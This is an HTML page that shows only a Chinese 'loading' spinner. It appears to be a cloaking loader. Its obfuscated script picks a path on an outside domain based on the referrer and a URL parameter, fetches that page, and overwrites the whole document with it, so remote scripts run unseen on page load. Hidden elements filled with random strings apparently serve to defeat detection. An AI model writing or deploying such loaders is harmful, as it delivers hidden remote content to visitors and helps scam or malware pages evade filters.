<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ZRXBdgc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ZRXBdgc .RFa6dfXOsb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ZRXBdgc .content {
            line-height: 50px;
            text-align: center
        }

        .ZRXBdgc .img {
            width: 100%
        }

        .ZRXBdgc .ckIIzUk {
            text-align: center
        }

        .ZRXBdgc .ckIIzUk span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ZRXBdgc .ckIIzUk span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ZRXBdgc .ckIIzUk span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ZRXBdgc .ckIIzUk span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ZRXBdgc .ckIIzUk span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ZRXBdgc .ckIIzUk span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ZRXBdgc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function uRjEugjVBQ2oa(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var USDqT = uRjEugjVBQ2oa('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ USDqT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ USDqT +".html?a=share";
		}
		
        xY0bdqWwe=url+"#"+new Date().getTime();
        xY0bdqWwe && function() {
            $.get(xY0bdqWwe, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<span style='display:none'>FA867zMnO28NhxdLANEqqO4xuzBGnmeSfjsxB1liH4788qOZNByWOC3vH3SzchfQjKhNNF5k2QNqCKZTsJ2sYv6kgqYXijgJWQLjC</span>
<ul style='display:none' >xyoQXQAKxBJJqTOIlNyUsV5XIKLQmY5NrgIIRh</ul>
<a  href='#' style='display:none'>tXXw1CdBXdypMHXrKUJ686zSF6uGSzU8whSpwGDAGjXj</a><div class="ZRXBdgc">
    <div class="RFa6dfXOsb">
        <div class="ckIIzUk">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >X0udCBeSE6kab9ZrOcrD3HyboDR8lcID1gc652TXo6jhhXqSE17DTdbhrX8Pqw2VqsOZs0si</li>
<ul style='display:none' >mHLRYdt2Qg7XLMgNmojuiNqIPL9ihEZFYajAmapqVH99RunTiMZsjfMpP1DeaPWo32WCl1XFQaqkOAX</ul>
<ul style='display:none' >mHLRYdt2Qg7XLMgNmojuiNqIPL9ihEZFYajAmapqVH99RunTiMZsjfMpP1DeaPWo32WCl1XFQaqkOAX</ul>
<a  href='#' style='display:none'>AYmupBe2OD5EpB7rJa04HNeyUMh7mC9vwWz94ruFqJob8npjSRsoaFTTJHUmNAaOh9zCJVisC4pr6FW9p</a></body>
</html>